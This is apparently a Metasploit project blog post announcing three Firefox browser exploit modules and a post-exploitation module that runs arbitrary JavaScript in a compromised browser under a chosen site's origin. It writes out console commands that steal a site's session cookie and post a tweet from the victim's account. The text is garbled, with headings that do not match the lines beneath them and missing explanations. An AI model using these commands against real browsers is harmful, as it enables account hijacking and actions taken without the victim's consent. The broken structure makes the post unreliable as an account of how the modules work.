Those of you with a keen eye on metasploit-framework/master will notice the addition of three new payloads:
How does it work?
- exploit/multi/browser/firefox_svg_plugin (Firefox 17.* + Flash)
- exploit/multi/browser/firefox_proto_crmfrequest (Firefox 5-15.*)
- exploit/multi/browser/firefox_xpi_bootstrapped_addon (all versions)
Why is it better?
post/firefox/gather/xss. To use it, simply specify the URL you want to run under and specify a SCRIPT option. The SCRIPT will be eval()'d by the payload and any results will be printed:
msf> use post/firefox/gather/xss msf> set SESSION 1 msf> set URL https://rapid7.com msf> set SCRIPT "send(document.cookie);" [+] id=f612814001be908ds79f
Or, with a slightly more advanced script which sends a tweet in the target browser:
msf> set URL https://twitter.com msf> set SCRIPT "$('.tweet-box').find('.tweet-box').focus().text('Metasploit Courtesy Tweet').parents('form').find('.tweet-button button').click(); return 'sent';" [+] sent
Note: You can use
send to send back data, but you can only send once.
If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.